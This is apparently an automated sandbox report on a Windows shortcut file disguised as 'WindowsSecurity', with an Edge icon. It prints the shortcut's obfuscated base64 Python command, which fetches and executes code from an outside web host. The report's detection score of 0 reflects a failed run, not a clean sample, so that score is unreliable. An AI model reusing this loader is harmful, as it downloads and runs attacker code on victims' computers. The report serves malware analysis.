Windows
Analysis Report
WindowsSecurity lnk.lnk
Overview
General Information
Sample name: | WindowsSecurity lnk.lnk |
Analysis ID: | 1562629 |
MD5: | b0c56b70d153bb8483b777f4dc497dec |
SHA1: | a8ac8ca4235a09866af27df2753c6063ade609d2 |
SHA256: | efd312a53f9675b926fb439ec2a4339fc72efb81592c843b2806690e5ba6b6bf |
Tags: | Compilazioneprotetticopyrightlnkuser-JAMESWT_MHT |
Errors
|
Detection
Score: | 0 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Click to jump to signature section
There are no malicious signatures, click here to show all signatures.
Source: | Classification label: |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1562629 |
Start date and time: | 2024-11-25 19:54:07 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 1m 23s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 0 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | WindowsSecurity lnk.lnk |
Detection: | UNKNOWN |
Classification: | unknown0.winLNK@0/0@0/0 |
Cookbook Comments: |
|
- No process behavior to analyse as no analysis process or sample was found
- Corrupt sample or wrongly selected analyzer. Details: The operation was canceled by the user.
- VT rate limit hit for: WindowsSecurity lnk.lnk
File type: | |
Entropy (8bit): | 2.958916320745213 |
TrID: |
|
File name: | WindowsSecurity lnk.lnk |
File size: | 2'352 bytes |
MD5: | b0c56b70d153bb8483b777f4dc497dec |
SHA1: | a8ac8ca4235a09866af27df2753c6063ade609d2 |
SHA256: | efd312a53f9675b926fb439ec2a4339fc72efb81592c843b2806690e5ba6b6bf |
SHA512: | ac2b8bce6dd75fa89955b17d80beaf99128e4b851e19faf9c4249ddd2ef89897077a45f6ad9977c87eee57fbfa54f350763939ee930dcd7b74e1eb13d15b03bd |
SSDEEP: | 24:8A3laRmCjvGksDjc+dNlu6VUeEqddNXuHYJ9HAVab/VL:8XRLjvGVc63u5eLdLXuH0AVab |
TLSH: | E241B3285DD61234E2B2CFB164F17B9589EE7EA7AB452D0D008407051822F00F9A5F7B |
File Content Preview: | L..................F.@......................................................=....P.O. .:i.....+00.../C:\...................P.1...........Users.<.............................................U.s.e.r.s.....P.1...........admin.<............................... |
Icon Hash: | 696951d5dddb4965 |
General | |
---|---|
Relative Path: | .\qkxB9Wn8nG\synaptics.exe |
Command Line Argument: | -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS93cC1jb250ZW50L2NhY2hlL3dwLXJvY2tldC9BZG9uaXMvQWRvbmlzJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))" |
Icon location: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe |